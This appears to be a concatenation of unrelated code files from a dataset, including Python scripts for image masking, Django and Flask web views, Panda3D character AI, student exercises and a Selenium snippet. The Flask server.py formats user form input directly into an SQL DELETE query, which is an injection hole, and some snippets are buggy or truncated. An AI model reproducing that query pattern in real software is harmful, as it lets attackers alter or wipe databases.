generator = PretrainDataGeneration(\n dataset_path='data/jawiki_norm.txt',\n# dataset_path='tests/sample_text.txt',\n output_path='tests/sample_text',\n vocab_path='data/32023.vocab',\n sp_model_path='data/32023.model',\n max_pos=512,\n epochs=1,\n tokenizer_name='sp_pos'\n )\n generator.generate()\n","sub_path":"create_pretrain_file.py","file_name":"create_pretrain_file.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"444936965","text":"#Pedro Gallino\n#12/7/17\n#palindrome.py - checks for the palindromes\n\ndictionary = open('engmix.txt')\n\nfor word in dictionary:\n word = word.strip()\n x = list(word)\n x.reverse()\n if x == list(word):\n print(word)\n \n\n","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"466821753","text":"import cv2\nimport cv2.cv as cv\nimport numpy as np\nimport imutils\n\n\nmask = cv2.imread('threshed.jpg')\nimg = cv2.imread('owlFiltered.jpg')\n#img2=imutils.resize(img,width=432,height=324)\n#img = cv2.medianBlur(img,5)\nmask=cv2.cvtColor(mask,cv2.COLOR_BGR2GRAY)\n\nret,mask=cv2.threshold(mask,10,1,cv2.THRESH_BINARY)\n\nb=np.multiply(img[:,:,0],mask)\ng=np.multiply(img[:,:,1],mask)\nr=np.multiply(img[:,:,2],mask)\n\nimg_final=np.zeros(img.shape[:])\nimg_final=np.uint8(img_final)\nimg_final[:,:,0]=b\nimg_final[:,:,1]=g\nimg_final[:,:,2]=r\n\n\nfiltered=imutils.resize(img_final,width=432,height=324)\n\n#cv2.imshow('detected circles',img2)\n#cv2.imshow('mask',mask)\ncv2.imshow('filtered',filtered)\ncv2.imwrite('FinalFiltered.jpg',img_final)\n\n\n\n#cv2.imshow('detected circles',img)\ncv2.waitKey(0)\ncv2.destroyAllWindows() ","sub_path":"cvFinalMask.py","file_name":"cvFinalMask.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"261745993","text":"from django.shortcuts import render\nfrom . 
import forms\n# Create your views here.\n\ndef index(request):\n    return render(request,'firstapp/index.html')\n\ndef form_name_view(request):\n    # an unbound form instance is passed to the html page for GET requests\n    form = forms.FormName()\n    if request.method=='POST':\n        # bind the form to the POSTed data so it can be validated\n        form = forms.FormName(request.POST)\n        if form.is_valid():\n            # do something with the validated data\n            print(\"Validation successful\")\n            print(\"Name :\",form.cleaned_data['name'])\n            print(\"Email :\",form.cleaned_data['email'])\n            print(\"Text :\",form.cleaned_data['text'])\n\n    return render(request,'firstapp/basic_form.html',{'form':form})\n","sub_path":"levelthree/firstapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"116339643","text":"import subprocess\nimport sqlite3\nimport pandas as pd\nfrom flask import Flask,request,render_template,redirect,send_file,send_from_directory\nimport os\nimport time\n# import requests\napp = Flask(__name__)\n\n@app.errorhandler(404)\ndef page_not_found(e):\n    return redirect('http://127.0.0.1:5000/home')\n\n@app.route('/')\ndef home():\n    return redirect('http://127.0.0.1:5000/home')\n\n@app.route('/home')\ndef my_form():\n    return render_template('home.html')\n\n@app.route('/home', methods=['POST'])\ndef my_form_post():\n    country_striped = request.form['input1']\n    city_striped = request.form['input2']\n    keyword_striped = request.form['input3']\n\n    country = country_striped.strip()\n    city = city_striped.strip()\n    keyword = keyword_striped.strip()\n\n    if country != '' and city != '' and keyword != '':\n        if (os.stat(os.path.abspath(os.curdir)+'\\country.txt').st_size != 0):\n            with open(os.path.abspath(os.curdir)+'\\country.txt', 'a') as f:\n                f.write('\\n')\n        if(os.stat(os.path.abspath(os.curdir)+'\\city.txt').st_size != 0):\n            with open(os.path.abspath(os.curdir)+'\\city.txt', 'a') as f:\n                f.write('\\n')\n        if (os.stat(os.path.abspath(os.curdir)+'\\keyword.txt').st_size != 0):\n            with open(os.path.abspath(os.curdir)+'\\keyword.txt', 'a') as f:\n                f.write('\\n')\n    new_country=''\n    new_city=''\n    new_keyword=''\n\n    for b in country:\n        if(b=='\\n'):\n            new_country+=''\n        else:\n            new_country+=b\n\n    for b in city:\n        if(b=='\\n'):\n            new_city+=''\n        else:\n            new_city+=b\n\n    for b in keyword:\n        if(b=='\\n'):\n            new_keyword += ''\n        else:\n            new_keyword += b\n\n    if request.method == 'POST':\n        if country!='' and city!='' and keyword!='':\n            with open(os.path.abspath(os.curdir)+'\\country.txt', 'a') as f:\n                f.write(str(new_country))\n            with open(os.path.abspath(os.curdir)+'\\city.txt', 'a') as f:\n                f.write(str(new_city))\n            with open(os.path.abspath(os.curdir)+'\\keyword.txt', 'a') as f:\n                f.write(str(new_keyword))\n    # return render_template('home.html', find=find,near=near)\n    return redirect('http://127.0.0.1:5000/home')\n\n@app.route(\"/view\")\ndef view_get():\n    con = sqlite3.connect(os.path.abspath(os.curdir)+\"\\searchdetail.db\")\n    con.row_factory = sqlite3.Row\n    cur = con.cursor()\n    cur.execute(\"select * from detail\")\n    rows = cur.fetchall()\n\n    return render_template(\"index.html\", rows=rows)\n\n@app.route(\"/delete\")\ndef delete_all():\n    con = sqlite3.connect(os.path.abspath(os.curdir)+\"\\searchdetail.db\")\n    con.row_factory = sqlite3.Row\n    cur = con.cursor()\n    cur.execute(\"select * from detail\")\n\n    cur.execute('DELETE FROM detail;', )\n    # rows = cur.fetchall()\n    con.commit()\n\n    return 
redirect('http://127.0.0.1:5000/view')\n\n\n@app.route(\"/convertcsv\")\ndef csv():\n con = sqlite3.connect(os.path.abspath(os.curdir)+\"\\searchdetail.db\")\n con.row_factory = sqlite3.Row\n\n df = pd.read_sql_query(\"SELECT * FROM detail\", con)\n print(df)\n print(type(df))\n\n with open(os.path.abspath(os.curdir)+'\\static\\details.csv', \"w\") as my_empty_csv:\n # now you have an empty file already\n pass\n\n df.to_csv(os.path.abspath(os.curdir)+'\\static\\details.csv', index=False)\n\n return redirect('http://127.0.0.1:5000/view')\n\n# @app.route(\"/down\")\n# def downloadcsv():\n# con = sqlite3.connect(os.path.abspath(os.curdir) + \"\\searchdetail.db\")\n# con.row_factory = sqlite3.Row\n#\n# df = pd.read_sql_query(\"SELECT * FROM detail\", con)\n# print(df)\n# print(type(df))\n# df.to_csv(os.path.abspath(os.curdir) + '\\details.csv', index=False)\n# time.sleep(20)\n# print(\"for downloading csv\")\n# #\n# return send_file(os.path.abspath(os.curdir)+'\\static\\details.csv',\n# mimetype='text/csv',\n# attachment_filename='details',\n# as_attachment=True)\n # print('hi')\n # return send_file(os.path.abspath(os.curdir)+'\\static\\details.csv',mimetype='text/csv',\n # attachment_filename='details.csv',as_attachment=True)\n # filename = 'details.csv'\n # uploads = os.path.abspath(os.curdir)+'\\static'\n # return send_from_directory(directory=uploads, filename=filename)\n\n\n@app.route(\"/deletebysearch\", methods=['POST'])\ndef deletebysearch():\n key_striped = request.form['del']\n\n key = key_striped.strip()\n print(key)\n print(type(key))\n if(key!=''):\n sqliteConnection = sqlite3.connect(os.path.abspath(os.curdir)+'\\searchdetail.db')\n cursor = sqliteConnection.cursor()\n\n # sql_delete_query = \"SELECT * FROM detail WHERE keyword LIKE '%Dentist%'\"\n # query = str(\"DELETE FROM detail WHERE keyword LIKE\"+ \" %{\".format(key))\n query = \"DELETE FROM detail WHERE keyword LIKE '%{}%'\".format(key)\n sql_delete_query = query\n cursor.execute(sql_delete_query)\n sqliteConnection.commit()\n\n return redirect('http://127.0.0.1:5000/view')\n\n\n@app.route(\"/view\", methods=['POST'])\ndef view():\n con = sqlite3.connect(os.path.abspath(os.curdir)+\"\\searchdetail.db\")\n con.row_factory = sqlite3.Row\n cur = con.cursor()\n\n\n\n # if request.method == 'POST':\n country_striped = request.form['input1']\n city_striped = request.form['input2']\n keyword_striped = request.form['input3']\n\n country = country_striped.strip()\n city = city_striped.strip()\n keyword = keyword_striped.strip()\n\n if(country!='' and city!='' and keyword!=''):\n # cur.execute(\"select * from detail where country\")\n cur.execute(\"SELECT * FROM detail WHERE country=? and city=? 
and keyword=?\", (country,city,keyword,))\n rows = cur.fetchall()\n if(len(rows)==0):\n cur.execute(\"select * from detail\")\n rows = cur.fetchall()\n else:\n cur.execute(\"select * from detail\")\n rows = cur.fetchall()\n return render_template(\"index.html\",rows = rows)\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"searchdetail/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"388531442","text":"#!/usr/bin/env python\n# vim:set fileencoding=utf-8:\n\nimport functools\n\n__all__ = ['memoized']\n\nclass memoized(object):\n \"\"\"Decorator that caches a function's return value each time it is called.\n If called later with the same arguments, the cached value is returned, and\n not reevaluated.\n \"\"\"\n\n def __init__(self, func):\n self.__func = func\n self.cache = {}\n\n self.__name__ = self.__func.__name__\n self.__doc__ = self.__func.__doc__\n\n def __call__(self, *args):\n try:\n return self.cache[args]\n except KeyError:\n value = self.__func(*args)\n self.cache[args] = value\n return value\n except TypeError:\n # Uncachable -- for instance, passing a list as an argument. Better\n # to not cache than to blow up entirely.\n return self.__func(*args)\n\n def __repr__(self):\n return '<{0}.memoized({1})>'.format(self.__module__,\n self.__func.__name__)\n\n def __get__(self, obj, objtype):\n # Support instance methods.\n return functools.partial(self.__call__, obj)\n\n\n# vim:set si tw=80 ts=4 sw=4 et nowrap:\n","sub_path":"pyfea/util/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"460117611","text":"from dataclasses import field\nimport random\n\nfrom panda3d.core import Vec3\n\nimport wecs\n\nfrom wecs.core import Component\nfrom wecs.core import System\nfrom wecs.core import and_filter\n\nfrom wecs.panda3d.character import CharacterController\nfrom wecs.panda3d.input import Input\n\n\ndef idle(entity):\n character = entity[CharacterController]\n character.move = Vec3(0, 0, 0)\n character.heading = 0.0\n character.pitch = 0.0\n character.sprints = False\n character.crouches = False\n character.jumps = False\n\n\ndef turn_left(entity, speed=1.0):\n character = entity[CharacterController]\n character.move = Vec3(0, 0, 0)\n character.heading = speed\n character.pitch = 0.0\n character.sprints = False\n character.crouches = False\n character.jumps = False\n\n\ndef turn_right(entity, speed=1.0):\n character = entity[CharacterController]\n character.move = Vec3(0, 0, 0)\n character.heading = -speed\n character.pitch = 0.0\n character.sprints = False\n character.crouches = False\n character.jumps = False\n\n\nclass BehaviorTree:\n def __init__(self, root):\n self.root = root\n\n def __call__(self, entity, *args):\n \"\"\"Returns True if node has run, False if it can't be run, and\n raises an exception for special cases, e.g. 
being done with a\n task.\"\"\"\n self.root(entity, *args)\n\n\nclass Priority:\n def __init__(self, *nodes):\n self.nodes = nodes\n \n def __call__(self, entity, *args):\n for node in self.nodes:\n if node(entity, *args):\n return True\n return False\n\n\n# Selector: Prioritized list of options.\n# Sequence: One child after the other\n# Parallel: Executes all children\n# FSM\n# Attached at runtime: Node behavior is specified re-/set runtime, if no\n# behavior is attached, node fails\n# Decorators: Modify node behavior\n# * Return\n# * Always succeed\n# * Always fail\n# * Always raise exception\n# * Interruptions\n# * Minimum / maximum distance to entity reached\n# * Sensor detects object\n# * Timeout\n# * Uninterruptable: Node will continue to be used until finished,\n# even if higher-priority options become activate in the meantime.\n# * Repetition\n# * Loop n times / infinitely\n# * Debugging\n# * Tag: Present active tags to user\n# * Message: Log message on activation / deactivation / per frame\n# * Breakpoint: Pause game and inspect behavior\n\n\n@Component()\nclass ConstantCharacterAI:\n \"\"\"\n Parameters for the 'constant' behavior.\n Keeps moving in the same direction.\n\n :param Vec3 move: (0, 0, 0) - relative directional movement speed\n :param float heading: 0.0 - heading\n :param float pitch: 0.0 - pitch\n :param bool sprints: False - is sprinting\n :param bool crouches: False - is crouching\n :param bool jumps: False - starts jumping\n \"\"\"\n\n move: Vec3 = field(default_factory=lambda:Vec3(0, 0, 0))\n heading: float = 0.0\n pitch: float = 0.0\n sprints: bool = False\n crouches: bool = False\n jumps: bool = False\n\n\ndef constant(entity):\n ai = entity[ConstantCharacterAI]\n character = entity[CharacterController]\n\n character.move = ai.move\n character.heading = ai.heading\n character.pitch = ai.pitch\n character.sprints = ai.sprints\n character.crouches = ai.crouches\n character.jumps = ai.jumps\n\n\n@Component()\nclass BrownianWalkerAI:\n '''\n Parameters for the 'brownian_walker' behavior.\n Moves randomly.\n\n :param Vec3 move: (0, 0, 0) - relative directional movement speed\n :param float heading: 0.0 - heading\n :param float heading_jitter: 0.0 - amount heading is randomized each update\n '''\n move: Vec3 = field(default_factory=lambda:Vec3(0, 1, 0))\n heading: float = 1.0\n heading_jitter = 0.1\n\n\ndef brownian_walker(entity):\n ai = entity[BrownianWalkerAI]\n character = entity[CharacterController]\n\n character.move = Vec3(\n ai.move.x * random.random(),\n ai.move.y * random.random(),\n ai.move.z * random.random(),\n )\n ai.heading += ai.heading_jitter * (random.random() - 0.5) * 2\n if ai.heading > 1:\n ai.heading -= 2\n elif ai.heading < -1:\n ai.heading += 2\n character.heading = ai.heading\n character.pitch = 0\n character.sprints = 0\n character.crouches = 0\n character.jumps = 0\n\n\ndef walk_to_entity(entity, target_entity_uid, coordinates=None):\n if coordinates is None:\n coordinates = Vec3(0, 0, 0)\n\n character = entity[CharacterController]\n target_entity = base.ecs_world.get_entity(target_entity_uid)\n\n character_node = entity[wecs.panda3d.prototype.Model].node\n target_node = target_entity[wecs.panda3d.prototype.Model].node\n rel_pos = character_node.get_relative_point(target_node, coordinates)\n xy_dist = Vec3(rel_pos.x, rel_pos.y, 0)\n\n character.heading = 0\n character.move = Vec3(0, 0, 0)\n character.pitch = 0\n character.sprints = 0\n character.crouches = 0\n character.jumps = 0\n\n # If the target is behind you, turn towards it.\n if 
rel_pos.y < 0:\n if rel_pos.x < 0:\n character.heading = 1\n else:\n character.heading = -1\n else:\n # If the target is outside a tight frontal cone, continue turning.\n if abs(rel_pos.x) * 5 > rel_pos.y:\n if rel_pos.x < 0:\n character.heading = 1\n else:\n character.heading = -1\n # If it is within a somewhat wider cone, move forward.\n if abs(rel_pos.x) * 2 < rel_pos.y:\n character.move = Vec3(0, 0.2, 0)\n\n\ndef behaviors():\n return dict(\n idle=idle,\n turn_left=turn_left,\n turn_right=turn_right,\n constant=constant,\n brownian_walker=brownian_walker,\n walk_to_entity=walk_to_entity,\n )\n\n\n@Component()\nclass BehaviorAI:\n '''\n Preprogrammed behaviors.\n '''\n behavior: str = field(default_factory=lambda: list(['idle']))\n behaviors: dict = field(default_factory=behaviors)\n\n\nclass Think(System):\n '''\n A System updating AI components.\n '''\n entity_filters = {\n 'behavior': [\n CharacterController,\n BehaviorAI,\n ],\n }\n\n def update(self, entities_by_filter):\n for entity in entities_by_filter['behavior']:\n ai = entity[BehaviorAI]\n behavior = ai.behavior[0]\n args = ai.behavior[1:]\n\n ai.behaviors[behavior](entity, *args)\n\n\nclass PrintBehaviorOnPlayerCharacters(System):\n entity_filters = {\n 'character': [Input, BehaviorAI, CharacterController],\n }\n\n def update(self, entities_by_filter):\n for entity in entities_by_filter['character']:\n behavior = entity[BehaviorAI]\n\n print(behavior.behavior)\n\n\nclass BehaviorInhibitsDirectCharacterControl(System):\n entity_filters = {\n 'character': [Input, BehaviorAI, CharacterController],\n }\n\n def update(self, entities_by_filter):\n for entity in entities_by_filter['character']:\n behavior = entity[BehaviorAI]\n input = entity[Input]\n\n if len(behavior.behavior) == 1 and behavior.behavior[0] == 'idle':\n input.contexts.add('character_movement')\n elif 'character_movement' in input.contexts:\n input.contexts.remove('character_movement')\n","sub_path":"wecs/panda3d/ai.py","file_name":"ai.py","file_ext":"py","file_size_in_byte":7319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"371505248","text":"#Alexander_Máni_Einarsson\r\n#12/11/19\r\n#Skilaverkefni 6\r\n\r\nimport random\r\n\r\non = True\r\nwhile on:\r\n print()\r\n print(\"=-=-=-> Skilaverkefni 6<-=-=-=\")\r\n print()\r\n print(\"1. Random tölur\")\r\n print(\"2. Talnabil\")\r\n print(\"3. Strengjalisti\")\r\n print(\"4. Samanburður\")\r\n print(\"5. Hætta\")\r\n val = int(input(\"Veldu: \"))\r\n if val == 1:\r\n print()\r\n print(\"Hér tekur foritið inn 50 tölur á bilini 5-70 að handahófi\")\r\n print(\"og prentar síðan út ýmsar staðreyndir\")\r\n talnalisti = []\r\n #50 random tölur á milli 5 og 70 fengnar\r\n for x in range(50):\r\n tala = random.randint(5,70)\r\n talnalisti.append(tala)\r\n teljari = 0\r\n margfeldi = 1\r\n #Allar tölur margfaldaðar\r\n for x in range(len(talnalisti)):\r\n margfeldi = margfeldi * talnalisti[teljari]\r\n teljari = teljari + 1\r\n #Ýmsar upplýsingar um listann, talnsalisti fenginn, útskýringar í græna letrinu\r\n print(\"Hér er margfeldi allra staka listans\", margfeldi)\r\n print(\"Hæsta stak listans er : \", max(talnalisti))\r\n print(\"Minnsta stak listans er: \", min(talnalisti))\r\n print(\"Hér er talnalistinn útprentaður: \",talnalisti)\r\n talnalisti.sort()\r\n print(\"Hér er talnalistinn raðaður og útprentaður: \",talnalisti)\r\n\r\n elif val == 2:\r\n print()\r\n tala = 2000\r\n talnalisti = []\r\n #Tölunar eiga að ver frá 2000-32000. 
það eru 1200 þar á milli svo það er range-ið svo fer það í if klausu sem finnur út hvort það gengur upp í 7 en ekki 5\r\n for x in range(1200):\r\n tala = tala + 1\r\n if tala % 7 == 0 and tala % 5 != 0:\r\n talnalisti.append(tala)\r\n teljari = 0\r\n #Foritið leggur saman allar tölunar í listanum í þessari slaufu\r\n for x in range(len(talnalisti)):\r\n print(\" Allar tölur listans í beinni línu með kommur á milli: \",talnalisti[teljari],\",\", end=\" \")\r\n teljari = teljari + 1\r\n print(\"\\n\",\"Summa allra a talna listans: \",sum(talnalisti))\r\n\r\n elif val == 3:\r\n print()\r\n teljari = 0\r\n ordalisti = []\r\n #Whie lykkja sem keyrir 10 sinnum\r\n while teljari < 10:\r\n ordin = input(\"Sláðu inn orð til að bæta í lista: \")\r\n ordalisti.append(ordin)\r\n teljari = teljari + 1\r\n teljari = 0\r\n print()\r\n print(\"Hér er annaðhvert orð í listanum skrifað út öfugt\")\r\n for x in range(len(ordalisti)):\r\n stak = ordalisti[teljari]\r\n if teljari % 2 == 0:\r\n print(stak[::-1])\r\n teljari = teljari + 1\r\n print()\r\n #Listinn aðeins raðaur í prentun svo hann helst óbreyttur í raun\r\n print(\"Hér er listinn raðaður: \", sorted(ordalisti))\r\n print()\r\n stafur = input(\"Sláðu inn þann staf sem á að eyða orðum með sama upphafsstaf: \")\r\n teljari = 0\r\n staf_teljari = 0\r\n nyr_listi = []\r\n print()\r\n #Nýr listi búinn með þeim orðum sem haf ekki sama upphafstaf og notandi gefur sem lætur það lýta út eins og eytt hefur verið þeim orðum sem byrja á þeim staf.\r\n for x in range(len(ordalisti)):\r\n stak = ordalisti[teljari]\r\n if stafur != stak[0]:\r\n nyr_listi.append(stak)\r\n else:\r\n staf_teljari = staf_teljari +1\r\n teljari = teljari + 1\r\n print()\r\n print(staf_teljari, \"Staf/Stöfum var eytt\")\r\n print()\r\n print(\"Hér er listinn út prentaður með eyddu orðunum: \",nyr_listi)\r\n\r\n elif val == 4:\r\n print()\r\n ordalisti = []\r\n teljari = 0\r\n #While lykkja sem keyrir 7 sinnum\r\n while teljari < 7:\r\n ordin = input(\"Sláðu inn orð til að bæta í lista: \")\r\n ordalisti.append(ordin)\r\n teljari = teljari + 1\r\n teljari = 0\r\n ordalisti_2 = []\r\n # While lykkja sem keyrir 6 sinnum\r\n while teljari < 6:\r\n ordin = input(\"Sláðu inn orð til að bæta í lista 2: \")\r\n ordalisti_2.append(ordin)\r\n teljari = teljari + 1\r\n nyr_listi = []\r\n teljari_1 = 0\r\n # While lykkja sem keyrir 7 sinnum\r\n #Með for lykkjunni fyrir neðan lætur þetta hvert einasta orð í báðum listum bers gi saman við hvort annað.\r\n while teljari_1 < 7:\r\n teljari = 0\r\n #Þetta keyrir sex sinnum\r\n for x in range(len(ordalisti_2)):\r\n stak = ordalisti[teljari_1]\r\n stafur = ordalisti_2[teljari]\r\n #Þau orð sem eru eins í báðum listum eru færð yfir í nýjan lista til að safna þeim sem eru eins\r\n if stafur == stak:\r\n nyr_listi.append(stak)\r\n teljari = teljari + 1\r\n teljari_1 = teljari_1 + 1\r\n print(\"Eftirfarandi orð eru eins í báðum listum\", nyr_listi)\r\n\r\n elif val == 5:\r\n print(\"Nú verður foritinu hætt\")\r\n quit()\r\n\r\n else:\r\n print(\"Villa hefur komið upp\")\r\n","sub_path":"py_projects/forritun/skilaverkefni/skilaverkefni_6.py","file_name":"skilaverkefni_6.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"355555125","text":"from selenium import webdriver\n\n# In This example In this case we capture the element, that we want to work with,\n# using javascript provided methods, then declare some actions on it and execute\n# this javascript using 
WebDriver.\n\n# Step 1) Open Firefox\ndriver = webdriver.Firefox()\n# Step 2) Navigate to OrangeHRM\ndriver.get(\"https://opensource-demo.orangehrmlive.com/\")\n\nsubmit = \"document.getElementsByName('Submit')[0].click();\"\ndriver.execute_script(submit)","sub_path":"TestScripts/JavaScript_Example/Execute_JavaScript_Exp1.py","file_name":"Execute_JavaScript_Exp1.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"499370282","text":"from RPG.consts.game_states import ESTRAD_TRADER, ESTRAD_TRADER_TRADE_MENU, ESTRAD_TRADER_BUY, ESTRAD_TRADER_SELL\nfrom RPG.bot_classes.base_dialog import BaseDialog\nfrom RPG.consts.quest_items import FEDERATION_PASS\nfrom RPG.consts.items import LITTLE_MED_PACK, LIGHT_SOLDIER_ARMOR_SET, LIGHT_LASER_RIFFLE, OLD_LASER_PISTOL\nfrom RPG.bot_classes.trader import TradeMenu\n\n\nclass EstradTrader(BaseDialog):\n def __init__(self, game):\n super().__init__(game, ESTRAD_TRADER, 'Soldado De La República Intergaláctica', '¡Salud! Aquí '\n 'puedes obtener una base '\n 'kit de soldado de la Federación si u'\n ' tienes una identificación, o '\n 'comprar equipo adicional,'\n ' si lo básico no es suficiente para TI.',\n '👨🏼')\n self.reply_keyboard.row('Muéstrame tus productos')\n self.reply_keyboard.row('Quiero conseguir un kit')\n self.reply_keyboard.row('Tengo que irme.')\n self.kit_given = False\n self.trade_menu = TradeMenu(game, self, ESTRAD_TRADER_TRADE_MENU, ESTRAD_TRADER_BUY, ESTRAD_TRADER_SELL,\n 'Mira esto., '\n 'lo que tengo.',\n [LITTLE_MED_PACK, OLD_LASER_PISTOL], 1.25)\n\n def handle(self, message):\n if message.text == 'Muéstrame tus productos':\n self.trade_menu.start(message)\n elif message.text == 'Quiero conseguir un kit':\n if FEDERATION_PASS in self.game.player.quest_items:\n if not self.kit_given:\n self.game.player.add_item(LIGHT_LASER_RIFFLE)\n self.game.player.add_item(LITTLE_MED_PACK)\n self.game.player.add_item(LIGHT_SOLDIER_ARMOR_SET)\n self.game.player.laser_ammo += 20\n self.kit_given = True\n self.say(message, 'Aquí tienes. 
Bienvenido a las filas de los colonizadores del planeta Estrada!')\n else:\n self.say(message, \"Un juego por mano, ya tienes el tuyo.\")\n else:\n self.say(message, 'Lo siento, sin un soldado de la Federación, no puedo darte un kit de combate.')\n elif message.text == 'Tengo que irme.':\n self.say(message, 'Pasa otra vez.')\n self.game.estrad.colony.start(message)\n else:\n self.show_input_error(message)\n","sub_path":"RPG/bot_classes/locations/planets/estrad/colony/estrad_trader.py","file_name":"estrad_trader.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"68692064","text":"#!/usr/bin/python3.7\n# -*- coding: utf-8 -*-\n# @Time : 2020/11/15 14:41\n# @Author : dly\n# @File : 142.py\n# @Desc :\n\nclass Solution(object):\n def detectCycle(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if not head or not head.next:\n return None\n\n slow = head\n fast = head\n while True:\n if not fast or not fast.next:\n return None\n slow = slow.next\n fast = fast.next.next\n if fast == slow:\n break\n\n fast = head\n while slow != fast:\n fast = fast.next\n slow = slow.next\n\n return fast\n","sub_path":"hot/142.py","file_name":"142.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"143374985","text":"import cocotb\nfrom cocotb.clock import Clock\nfrom cocotb.triggers import Timer\nfrom cocotb.triggers import FallingEdge\nfrom cocotb.triggers import RisingEdge\nfrom cocotb.triggers import ClockCycles\nfrom cocotb.result import TestFailure\nfrom threading import Thread\nfrom functools import partial\n\n\np = []\n\nasync def run_task(t):\n t = Thread(target = t)\n t.start()\n\n i = 0\n print(\"looping sim to allow the test run\")\n while t.is_alive():\n i += 1\n await Timer(10000000, 'step')\n\n print(\"waiting for test thread\")\n t.join()\n\ndef start(l):\n if isinstance(l, list):\n for i in l:\n start(i)\n else:\n for j in l.get_test_processes():\n p.append(cocotb.fork(j()))\n\ndef stop():\n print(\"waiting for uart processes\")\n for i in p:\n i.join()\n\nasync def run(pr, *args, **kwargs):\n for i in args:\n start(i)\n for i in kwargs:\n start(kwargs[i])\n await run_task(partial(pr, *args, **kwargs))\n stop()\n\n","sub_path":"cocotb_test.py","file_name":"cocotb_test.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"588742835","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# if语句\n# 根据Python的缩进规则,如果if语句判断是True,就执行缩进的两行print语句\nage = 20\nif age >= 18:\n print('your age is', age)\n print('adult')\n# if-else语句(注意不要少写:)\nage = 3\nif age >= 18:\n print('your age is', age)\n print('adult')\nelse:\n print('your age is', age)\n print('teenager')\n# if-elif-else语句\nage = 3\nif age >= 18:\n print('adult')\nelif age >= 6:\n print('teenager')\nelse:\n print('kid')\n# if判断条件可以简写,只要表达式是非零数值、非空字符串、非空list等就判断为True,否则为False\nif 1:\n print('True')\n\n# for...in循环,依赖把list或tuple中的每个元素迭代出来\nnames = ['Michael', 'Bob', 'Tracy']\nfor name in names:\n print(name)\nsum = 0\n# 计算1-10的整数之和\nfor x in [1,2,3,4,5,6,7,8,9,10]:\n sum = sum + x\nprint(sum)\n# 计算1-100的整数之和,可使用range(x)函数生成一个从0开始小于x的整数序列\nsum = 0\nfor x in range(101):\n sum = sum + x\nprint(sum)\n\n# while循环\nsum = 0\nn = 99\nwhile n > 0:\n sum = sum + n\n n = n - 2\nprint(sum)\n\n# 根据输入的年份进行判断\nbirth = input('birth: ')\n\n# TypeError: '<' 
not supported between instances of 'str' and 'int'\ntry:\n    if(birth < 2000):\n        print(u'00前')\n    else:\n        print(u'00后')\nexcept TypeError as e:\n    print(e)\n# 以上代码输入1989却输出:00后,这显然是不对的\n# input读取的内容永远以字符串形式返回,必须先用int()把字符串转换为整型\nbirth = int(input('birth: '))\nprint('birth < 2000:', birth < 2000)\n\n","sub_path":"ifforwhile.py","file_name":"ifforwhile.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"244374975","text":"\"\"\"\r\nWrite a program that computes the value of a+aa+aaa+aaaa with a given digit as the value of a.\r\nSuppose the following input is supplied to the program:\r\n9\r\nThen, the output should be:\r\n11106\r\n\r\nHints:\r\nIn case of input data being supplied to the question, it should be assumed to be a console input.\r\n\"\"\"\r\n\r\nx = int(input(\"Enter a number: \"))\r\na = int(\"%s\" % x)\r\nb = int(\"%s%s\" % (x, x))\r\nc = int(\"%s%s%s\" % (x, x, x))\r\nd = int(\"%s%s%s%s\" % (x, x, x, x))\r\nprint(a + b + c + d)\r\n","sub_path":"AddingADigit.py","file_name":"AddingADigit.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"560875808","text":"\"\"\"DOCSTRING\"\"\"\nfrom flask import Flask, render_template, request\nfrom tscores import Scores\n\nAPP = Flask(__name__)\nSCORE = Scores()\n\n@APP.route('/')\ndef hello_world():\n    \"\"\"Takes the information from the score form in index.html\"\"\"\n    team = request.args.get('team')\n    dscore = request.args.get('dscore')\n    score1 = SCORE.get_score('team1')\n    score2 = SCORE.get_score('team2')\n    # both scores must go into a single response; a second return is unreachable\n    return render_template('index.html', score1=score1, score2=score2)\n    \nif __name__ == '__main__':\n    APP.run(debug=True)\n","sub_path":"score_app/score_app.py","file_name":"score_app.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"250104835","text":"from django.http import HttpResponse\nimport json\nfrom ..models import Task, Task_detail\n\n\ndef task_detail(request, id):\n    ret_dict = []\n    # default so 'tasks' is defined even when id is neither 'all' nor a digit\n    tasks = []\n\n    if id == 'all':\n        tasks = Task_detail.objects.all().values()\n    elif id.isdigit():\n        tasks = Task_detail.objects.filter(pk=int(id)).values()\n\n    if not tasks:\n        ret_dict.append(\"Error: There are no records for id {}\".format(id))\n\n    for task in tasks:\n        